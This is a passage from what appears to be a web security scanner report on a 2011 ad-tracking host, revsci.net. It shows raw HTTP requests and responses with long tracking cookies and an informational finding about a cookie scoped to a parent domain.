NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_7f6N="MLsXtSUNJzhrJYH0ScWkPkhBBfNq5qBaGQ3qzoP5xBGN/o8cCs3mUZnXbTs7xC8rSXKo6YkwBjeU7n0HjpfObSZZbloBxLkme3gWgzBtB3Yl5x7YdhbCZrIyMekM0f84GWj2mgVtBMVC6E+uIyenwlspAfS0UQtXbsnXhZ5Y0x4JtT658dKcNNjdegsSijmdXEygCFS113EHW8b7JJvYPrTF9VsmbzD+LeLUf4i0Gdj14MiCiPdGh2LR4jKWmbQ1SzIt6HOjCeqgUx9gFKMhOcSYsBIh55NoYh6xPDldGUpR649p/qnN6fsRcLjvyBe17Lc6fldd1OkklXuuDqUNpM9SEZh91L2EpyyzjVJc74z9FGgDHsf/IH/7R0SivAdb77c8OqDTa9YGXcix7Qi5w46FZU4UM0W8BtkhYP+YNwKjnBH/YZaPSXYbheh1c1bPS22aFr5WSK21dPY8WDGjLEFpo314ZFyEeLJfEUQY5TMh9PwsGullfVTd3/cvL88YLHs+yF7HWn4XuKwJDDQUBc74KdslNSaIRFpp+dS+ocyq1f0njRO+h5zLz3W4+8LUgAi8a1uNp2ih68cjSIKAIhm9a9QOwj4VC28+EsCMWcTgpe5r+BtJL0PRCo1gv9gkL8O/nYOADDqJYS/6rOIoy2hgqRUazmErqb3n7k4VSUjF8xWnwwKCJElDGIOAJs2i4pQmyIDZueYYL9JYs44vRk2so/KvCmp0c8AWu7ZHB1UDEusauB+oFrzyxRAhFFfmsed+QUJ7TfjaHfCfiB5/FQMa0SdJ8HqPJIeEx2K9AhBbJMP7Wrj291+Z6Gnuu9k9VjqKmPOyYx5vtDMr5Rmw1gXDjnj3u9amfHmk2LDQvXQWdTUKCSf5ZzpxMrsS567GHLjGAsWGTczdZKQq+d8L8QzoAyMozYFAM/dXv6nEgLMt3wYY094cGcLgl9GJyv9lr0hgOV41/khAAoQ4NUohTtwJ8PExCPQDf5wvSWwV2lQcgRnOlCF/QuQTgYPL5ESj+pvb6k6bMkOeuFPa8C+tQ9StAnm/VHV2FiAACUyL/BXk7j8/GYWNG3r6RAHz+RBdMGvvb0PgCrgBXvu88pmHSdW7rHEQ1jAokIsRAklxmztwMkmHIeS0SygCayPy+b2pp7fkSAYJBdJ84V06UnAoPy8XdPINNS/Af/AOizZQR7yTpcXG4vuRzjlmpTk8hghZn0t5N0CCDDvr5xdFxHQJ9pbPIAWtT2rlPQLv40ErYUoOk0Qh8HZO3wCuw8/+f4qHxJgx9a4EcmoNxCjWJnU4PsXp7o5HHz3i9xZGv09D6qmD2bMINkwdY7hUZuYEFk8/yaJBZK48dfZFEZaf0K01jV/j98Rg"; rsi_us_1000000="pUM14y+jOBYULQE0ur/Thhu0D2LK/OWnjvo88q/k8TGDoK1ZqXQD+bEm3drz/lAH4PpnZegZFthRzM9UrIPq/WGfYSdxS0Lx7yq9wHoxUlunQPwCvSfZ3AzY1r/NL4mN135xNvvtitbB6wzPhqDYb6s/r4BUehWWM9HDtG5VYAXizGb0Z1krvC5z67DxDZFkxEELUQKDUeKVdafc4Jx9UWu6Mr2gv0NvqJG4xJF4Pwd94ADjEfyJL9BchtTR2JgTu504d/PKipCwS9Xe59Yhf0QpOI+FlyFpTLT/nqm0aQ19kdGmwwEBRzBETenkVnLuiOfuj+Fgy0zl8puM341Vhio1YyAjD7RCILOU8pL1usRQvBW2xiNNS+5buc+4jKzh9LDdUho7DjCvndvhdJylJrdItjNMvhCe3W9yg5zp0U3feDfiUl5xsXUkACo7Z3R5szIArFK/kJLV0KXlK83dD8KazNvlpkjSsw7gPlxDKP6EbdHXIMi/4tkXYh+1HE9Dcbu9KxoengULxPdthpplIBL+ZwEE5aBQSRXqkNJFh0Ei5rS+JP2fhjyMohubGzQ7CxNQO24NWurKi8YfO64uca2p5XJKopOL/ow6aYePp1MwoS5w8ecleWV5FXTlO/5hJcgUREU70zPOReRUXKL+ldij0proJCnlRi8MXvDm9lB6ZBxdj8le9VmqucTxBJGPBoGHJR4In+8q7uAVv7gAmQmWJQ21t2MDuyF21i876etlXtXB+ZwEiLMBPwi9Qfy4yfQ6YB4ODmYjSDzI5zhnpwZeeQPM302wZDi2snb13gcNTQpJ9t8MMwFlbtk5CCJ7XPf6pNxDaI9xsBS8iSUg4vxfnMVujg2SGfA6OhxbG7n9/py50g8LD5dlTDYWrTUDkIvHroa9irk6vjE0B8LTb346tHfXfg9v+7PCy2ImQ3QMMeuBwLuIvHadJgmzqyRE5NjQAlvjhb6RPMisgATNFuOC3dfaXOuwq0R+xjUjSRFfT8L8JMl40MQuusmi6BVjfE44rdDG2oWMRiIfgDhZX4L98YighsOSwFfUjjRcZ5+OpBHUG0B2DmsrZSeXZ/WnnLjF6MXTR3t61NidijXlNnwZrvYkwdgwyVP/eZooADCjNhuXIEmtSPSuhHMcXKWRafA2pdIG5Wii1lB3al5mllkJ6dvxGDSVqkWlSUZ+huXyzWn/t4ictxprV1kf9lP0bsuYQh84NlbvpEYYMZTynzv0EL9o0p4/NdSbSvBBFYd429I0fwoy3t77K2d9NC3HbdZPsJGqehlYEhTtWLlGHcku8hmH8DFW8f973nitH79gpvOwDLjwuxbX6dYurXL6rTYLl3zo2vGm95eZ/V+UWnfFae4PpSZ0u6K3i2fLerQWwsNMimOLPo4y+6Dl8BZ1y1PL1WcdXkrhhr5ozxO/0DWiztj7fX4gvYutHHFIwzMWb6yfjZwKxBa/OWbgOtw9JW00yHdeNkM9a+1V3lc5PYk08xs+rxYYUTxY4BcbrBi6r45I5kKpzjnl1iHrtRFRkvM6Bhbrpz4MJejvDbyOCoTJOiIcMmzkzESXwxTtQYGiFsVxrM33xHkSEKdH95iWNzaHWzSCBcMdq0MVSLxiiVFYktnDOVWuF2uFglAGyFKV7XFR5okubFHoknGSnZO4YJaMbkmIeCS/R+S4e5J0MXLfYW6Pp2yf0r5n6TdW/Ev5wAMinj4iQV6pCBvZnZHy1jzS0kmuDyJcaNFLXLOzx1Mc3oW1p4FzyqyfubMNTg09SVgOQkTsK319CgR0EEJ0HdWo"; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXZ8qnxnNHqGrp84hH/bhN0xQhhC/ClGwluOot5h4oBVsD6ALEYUKyqBeWepreKoVF7DsYGi2UeMmwFsPg1EszBY7xQXHhc7yzX/uLvFPyHlj8Anxa3HFtuABz8ZSEkSdoOrb5c2UAMjg+q8ignfisMx49t0m73AuXYM7UFxfmt1Nb6qxWHwjPJThZmTvo4fHv1sFElaVZMwQ8GPkKRHtqErQCd+aGJaleRc92rFT6wCDGeCebWg9kyOHYUlqzwc7Zx06FXv/oUdXx9OhQFP+RtkGUDynUy6CBi54mOYpZpC2pPFgE6FJQ7lHNMQ=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWoZUQSG9hlG1bae3RCnDYdyPQRhCrxtrzkP3d14d3S5w0mtMH2weQSGYPTNWz9C1DH9tRfjw4t7jgY8E1Syo1RXJ3j/iiKhEBH6CcFOAsZTHyGci6z08ra07WZZuavu0gC4rxNnZ3nu/7w3rzBduHuYcjb1soyILRWKIS+7LyZ7TmE7e99bDIS7fGQBwxkT6ha934b0MUwGC7gJSChwg8lZOmUN8MQxPagP0x; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:27:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:27:24 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.209. http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/944603151.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6Wk9GL9HmpbJCCrFaeDS5h0D0WIolggMv/fNJOWq0vntsKGDBzKGBsUdIzcN0mSr75VwD603UY3u6ShdsaYshJs6U8VJLKvVmlbKyEmmB+L2lp9JqHsvRLqgLOl5XDKKRoQc/UBmorHEc/TIHBJFRVSZrobvtLMxEgZPYyKL0er8BWtYtV0dLN3aZo9p/px9SgBpbFrXxLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXC6/gyl3syAq1j4FvExFWoTXBQ+1cB2yKM4hO2SOJ36fEeirt82DeCpboe+cnD9JZgSt6tgdDD7qFfWLRUPk7U7uupp/Vn4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/944603151.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=MLvP+AcpJjhn55IUHe+wOlSBED5lJzZacznWHPAXKAr0D9roytSF+7PSKHqE3rI/WYb4Td+xYUhxI3PsR9aEsBkGAsAxyTZl7WmqWjlh/TIl10p7NcM8H91EU3obfHLvVRvTF4iKz8mPuIzm7ilpM3L1V7ATmEGhEHiE3/dOr9zlUv4Y72Iq2KJ/RqFOzz93nu4vjA1GBeO4kKYLVFF/sw5JYLdVJpI2199dnT0ERkLPg3d6swC7cBBk31CeFhpiohz/iS8+10zgJTNstk255wLHDl1Idr/jZOzv9A3KeHfq/Sk4ucu3xXZUERUKLOdEJdECU7Et1uqVRCdSZYdr6P5uewTYaSTHLN9QlyflNw8Q0OE1udNfjcbvSkiFAuWtObufdL8eMv4917OpVZPxA/e4WzP11ST5MpWHdEvjfFw2TR8oD+hdudZjbT74sUCIsc1rBPZDY/yiFpckFowkZi7Vbp0VAI46yH9MMRURWFdQ8FveNSP4wVFh/MYfOT+bLV4caNbjjMW7Snbd9tR48TBTOxKVLpuvl9FFitRWH2qsZk+qDPVdlB6KrRuGxN4ut7Ikr6OpbUTSJD5bqhXHZXT+r2XQ26o9RfRE/5poIZMRexe7OZfupLJmDv8nHBZg2a0NkYbXZsynSDDlnrw8gSdLjS/fRwecwa0Q7T6BVRH2KtA22KazQVVzwx9y18YVhRD7ztjusQQv+d45hn38mikAse0oA6LxG1tg0g0pnpxk9PfxErgsLkI9Mll27KUximeEiXMsNS4LOg3XW598/QC3+vJxp2XGiQFdEBMw0ujUCXOsX26eyz67iDXCibElRhZEDNOZXubP5GZxFwC56LBiVrqzDFz3Cds68+P3szk2TNn462pccFbsgYYpl3QeUDkyCxfBjm6gB6ka+U1Q8wHKV1QrpHjvQsFvJP5EetB/sMD9zP+eQc7zBK4Ma9kCzRP60y9TWKgt7AeOE7WcEy0/G20xzwPGlBp62wdGzjw1Ca3LvuMkS5YPIk7dTj9VUZctvi3gVP2FKiL9Rif1T1MvcjZqSEI+eDZwf30mZA908kogZVRr7jVz6HzjSuIpsE0WokWmwcPdrmO3RFA2WvJby/InqSRTppQOl1BLq3vTMpveSebRYqJEgKDazX2FgtDs9njTH4J14iIbl8OkU/aWkiYjvWFpW3M7OVDdQMj2Ix5ik4yweDXobNxN4JdZEURaAM7GVCOgGPHL0Fcf7sdmTggoRn9AiR0GJsxYQikt7AU9gi7kPVB7Hvf0tfaDR3FPnjUp0wTe4IljiVW9v9i0OJNk/9rufkbN